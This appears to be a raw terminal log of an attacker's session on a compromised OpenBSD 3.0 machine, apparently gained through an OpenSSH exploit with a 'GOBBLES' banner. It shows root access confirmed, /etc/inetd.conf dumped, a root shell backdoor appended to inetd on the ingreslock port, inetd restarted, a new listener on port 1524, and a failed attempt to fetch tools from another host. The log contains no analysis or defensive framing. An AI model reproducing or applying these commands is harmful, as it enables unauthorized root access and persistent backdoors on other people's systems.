SSH-1.99-OpenSSH_3.0 SSH-2.0-GOBBLES GGGGO*GOBBLE* uname -a;id OpenBSD pufferfish 3.0 GENERIC#94 i386 uid=0(root) gid=0(wheel) groups=0(wheel) cat /etc/inetd.conf # $OpenBSD: inetd.conf,v 1.41 2001/09/25 01:00:21 deraadt Exp $ # # Internet server configuration database # # define *both* IPv4 and IPv6 entries for dual-stack support. # #ftp stream tcp nowait root /usr/libexec/ftpd ftpd -US #ftp stream tcp6 nowait root /usr/libexec/ftpd ftpd -US #telnet stream tcp nowait root /usr/libexec/telnetd telnetd -k #telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd -k #shell stream tcp nowait root /usr/libexec/rshd rshd -L #shell stream tcp6 nowait root /usr/libexec/rshd rshd -L #login stream tcp nowait root /usr/libexec/rlogind rlogind #login stream tcp6 nowait root /usr/libexec/rlogind rlogind #exec stream tcp nowait root /usr/libexec/rexecd rexecd #uucpd stream tcp nowait root /usr/libexec/uucpd uucpd #finger stream tcp nowait nobody /usr/libexec/fingerd fingerd -lsm #finger stream tcp6 nowait nobody /usr/libexec/fingerd fingerd -lsm ident stream tcp nowait nobody /usr/libexec/identd identd -el ident stream tcp6 nowait nobody /usr/libexec/identd identd -el #tftp dgram udp wait root /usr/libexec/tftpd tftpd -s /tftpboot comsat dgram udp wait root /usr/libexec/comsat comsat comsat dgram udp6 wait root /usr/libexec/comsat comsat #ntalk dgram udp wait root /usr/libexec/ntalkd ntalkd #bootps dgram udp wait root /usr/sbin/bootpd bootpd #pop3 stream tcp nowait root /usr/sbin/popa3d popa3d # Internal services #echo stream tcp nowait root internal #echo stream tcp6 nowait root internal #discard stream tcp nowait root internal #discard stream tcp6 nowait root internal #chargen stream tcp nowait root internal #chargen stream tcp6 nowait root internal daytime stream tcp nowait root internal daytime stream tcp6 nowait root internal time stream tcp nowait root internal time stream tcp6 nowait root internal #echo dgram udp wait root internal #echo dgram udp6 wait root internal #discard dgram udp wait root internal #discard dgram udp6 wait root internal #chargen dgram udp wait root internal #chargen dgram udp6 wait root internal #daytime dgram udp wait root internal #daytime dgram udp6 wait root internal #time dgram udp wait root internal #time dgram udp6 wait root internal # Kerberos authenticated services #klogin stream tcp nowait root /usr/libexec/rlogind rlogind -k #eklogin stream tcp nowait root /usr/libexec/rlogind rlogind -kx #kshell stream tcp nowait root /usr/libexec/rshd rshd -k #ekshell stream tcp nowait root /usr/libexec/rshd rshd -Lk #ekshell2 stream tcp nowait root /usr/libexec/rshd rshd -Lk #kauth stream tcp nowait root /usr/libexec/kauthd kauthd # Encrypted X connections #kx stream tcp nowait root /usr/X11R6/bin/kxd kxd # RPC based services rstatd/1-3 dgram rpc/udp wait root /usr/libexec/rpc.rstatd rpc.rstatd rusersd/1-3 dgram rpc/udp wait root /usr/libexec/rpc.rusersd rpc.rusersd #walld/1 dgram rpc/udp wait root /usr/libexec/rpc.rwalld rpc.rwalld #sprayd/1 dgram rpc/udp wait root /usr/libexec/rpc.sprayd rpc.sprayd #rquotad/1 dgram rpc/udp wait root /usr/libexec/rpc.rquotad rpc.rquotad /bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x inetd: illegal option -- s usage: inetd [-R rate] [-d] [conf] echo "ingreslock stream tcp nowait root /bin/sh sh -i" ingreslock stream tcp nowait root /bin/sh sh -i echo "ingreslock stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf killall -HUP inetd //bin/sh: [6]: killall: not found ps -aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 1735 0.0 0.1 284 208 ?? R 3:05PM 0:00.00 ps -aux root 25892 0.0 0.2 104 452 ?? Ss Tue02PM 0:00.14 syslogd root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap root 24196 0.0 0.6 1072 1544 ?? Ss Tue02PM 0:00.59 /usr/sbin/htt root 10597 0.0 0.2 80 472 ?? Is Tue02PM 0:00.02 inetd root 212 0.0 0.5 836 1328 ?? Ss Tue02PM 0:01.28 sendmail: acc www 25404 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 29861 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 1034 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 10944 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 2344 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.53 /usr/sbin/ssh root 11182 0.0 0.2 224 536 ?? Ss Tue02PM 0:00.31 cron root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/ root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/ root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/ root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/ root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/ megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash root 20173 0.0 0.1 372 272 ?? I 3:00PM 0:00.24 //bin/sh root 555 0.0 0.1 372 256 ?? S 3:03PM 0:00.25 //bin/sh root 29679 0.0 0.1 292 144 ?? S 3:04PM 0:00.01 ping 192.168. root 10124 0.0 0.1 372 260 ?? S 3:04PM 0:00.22 //bin/sh root 28349 0.0 0.1 372 260 ?? S 3:05PM 0:00.00 /bin/sh root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init kill -HUP 10597 ps -aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 23395 0.0 0.1 284 216 ?? R 3:07PM 0:00.00 ps -aux root 25892 0.0 0.2 104 452 ?? Ss Tue02PM 0:00.14 syslogd root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap root 24196 0.0 0.6 1072 1544 ?? Ss Tue02PM 0:00.59 /usr/sbin/htt root 10597 0.0 0.2 88 492 ?? Is Tue02PM 0:00.02 inetd root 212 0.0 0.5 836 1328 ?? Ss Tue02PM 0:01.28 sendmail: acc www 25404 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 29861 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt www 1034 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 10944 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt www 2344 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.53 /usr/sbin/ssh root 11182 0.0 0.2 224 536 ?? Ss Tue02PM 0:00.31 cron root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/ root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/ root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/ root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/ root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/ megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash root 20173 0.0 0.1 372 272 ?? I 3:00PM 0:00.24 //bin/sh root 555 0.0 0.1 372 260 ?? S 3:03PM 0:00.25 //bin/sh root 29679 0.0 0.1 292 144 ?? S 3:04PM 0:00.02 ping 192.168. root 4340 0.0 0.1 372 260 ?? S 3:05PM 0:00.23 //bin/sh root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp 0 0 *.1524 *.* LISTEN tcp 0 0 192.168.3.100.22 Hacker1.64916 ESTABLISHED tcp 0 0 192.168.3.100.22 Hacker1Again.64864 FIN_WAIT_2 tcp 0 0 *.22 *.* LISTEN tcp 0 0 127.0.0.1.587 *.* LISTEN tcp 0 0 127.0.0.1.25 *.* LISTEN tcp 0 0 *.37 *.* LISTEN tcp 0 0 *.13 *.* LISTEN tcp 0 0 *.113 *.* LISTEN tcp 0 0 *.80 *.* LISTEN tcp 0 0 127.0.0.1.111 *.* LISTEN tcp 0 0 *.111 *.* LISTEN udp 0 0 *.648 *.* udp 0 0 *.739 *.* udp 0 0 *.512 *.* udp 0 0 127.0.0.1.111 *.* udp 0 0 *.514 *.* udp 0 0 *.111 *.* tcp6 0 0 *.22 *.* LISTEN tcp6 0 0 ::1.587 *.* LISTEN tcp6 0 0 ::1.25 *.* LISTEN tcp6 0 0 *.37 *.* LISTEN tcp6 0 0 *.13 *.* LISTEN tcp6 0 0 *.113 *.* LISTEN udp6 0 0 *.512 *.* Active UNIX domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr 0xe0b0b700 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af4300 0xe0afc000 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af43c0 0xe0ae1f00 dgram 0 0 0x0 0xe0a97040 0x0 0xe0a58280 0xe0add800 dgram 0 0 0x0 0xe0a97040 0x0 0x0 0xe0ace500 dgram 0 0 0xefb43dd4 0x0 0xe0b09fc0 0x0 /dev/log cd /usr/libexec mkdir nn telnet 192.168.0.1 fetch telnet: connect to address 192.168.0.1: Connection timed out Trying 192.168.0.1... //bin/sh: [14]: fetch: not found